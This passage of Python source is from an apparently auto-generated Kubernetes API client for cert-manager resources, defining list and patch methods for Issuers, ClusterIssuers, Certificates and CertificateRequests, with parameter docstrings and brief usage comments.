def list_namespaced_issuer(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_issuer # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_issuer(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3IssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_issuer_with_http_info(namespace, **kwargs) # noqa: E501
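# Illustrative usage sketch: `label_selector` and `field_selector` are passed
# through as the `labelSelector`/`fieldSelector` query parameters and use the
# standard Kubernetes selector syntax.
# >>> mine = api.list_namespaced_issuer(
# ...     'default', label_selector='app.kubernetes.io/managed-by=my-tool')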
def list_namespaced_issuer_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_issuer # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_issuer_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3IssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3IssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
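# Illustrative usage sketch: the *_with_http_info variants return a
# (data, status_code, headers) tuple instead of just the decoded body, and
# passing _preload_content=False yields the raw urllib3.HTTPResponse instead.
# >>> issuers, status, headers = api.list_namespaced_issuer_with_http_info('default')
# >>> assert status == 200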
def patch_cluster_issuer(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer # noqa: E501
partially update the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_cluster_issuer_with_http_info(name, body, **kwargs) # noqa: E501
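# Illustrative usage sketch: the select_header_content_type call in the
# *_with_http_info body below advertises json-patch first, so in this build
# `body` is most naturally an RFC 6902 list of operations; whether a
# plain-dict merge patch is also accepted depends on the api_client
# implementation and is an assumption to verify.
# >>> ops = [{'op': 'add', 'path': '/metadata/labels/team', 'value': 'platform'}]
# >>> issuer = api.patch_cluster_issuer('letsencrypt-prod', ops)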
def patch_cluster_issuer_with_http_info(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer # noqa: E501
partially update the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_cluster_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
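# Illustrative usage sketch: dry_run='All' runs the full admission and
# validation chain on the server without persisting the patch, returning the
# object as it would have been stored.
# >>> issuer, status, _ = api.patch_cluster_issuer_with_http_info(
# ...     'letsencrypt-prod', ops, dry_run='All')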
def patch_cluster_issuer_status(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer_status # noqa: E501
partially update status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_status(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_cluster_issuer_status_with_http_info(name, body, **kwargs) # noqa: E501
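# Illustrative usage sketch: this call targets the /status subresource, so
# the API server only applies changes under .status (assuming the CRD has the
# status subresource enabled); spec changes in the patch body are ignored.
# >>> ops = [{'op': 'replace', 'path': '/status/conditions', 'value': []}]
# >>> issuer = api.patch_cluster_issuer_status('letsencrypt-prod', ops)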
def patch_cluster_issuer_status_with_http_info(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer_status # noqa: E501
partially update status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_status_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_cluster_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate # noqa: E501
partially update the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_with_http_info(name, namespace, body, **kwargs) # noqa: E501
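# Illustrative usage sketch: namespaced patch calls take both `name` and
# `namespace`, which become the {name} and {namespace} path parameters.
# >>> ops = [{'op': 'add', 'path': '/metadata/labels/audited', 'value': 'true'}]
# >>> cert = api.patch_namespaced_certificate('tls-cert', 'default', ops)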
def patch_namespaced_certificate_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate # noqa: E501
partially update the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `patch_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
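# Illustrative usage sketch: with async_req=True the call returns immediately
# with an async result handle (a thread-pool ApplyResult in typical generated
# clients); .get() blocks until the response arrives or re-raises the
# underlying exception.
# >>> thread = api.patch_namespaced_certificate('tls-cert', 'default', ops,
# ...                                           async_req=True)
# >>> cert = thread.get()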
def patch_namespaced_certificate_request(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request # noqa: E501
partially update the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_namespaced_certificate_request_with_http_info(name, namespace, body, **kwargs) # noqa: E501
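# Illustrative usage sketch: field_manager records the manager name in the
# object's managedFields, which the server uses for ownership tracking and
# server-side-apply conflict detection.
# >>> cr = api.patch_namespaced_certificate_request(
# ...     'my-cr', 'default', ops, field_manager='audit-script')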
def patch_namespaced_certificate_request_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate_request # noqa: E501
partially update the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate_request_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or equal to 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
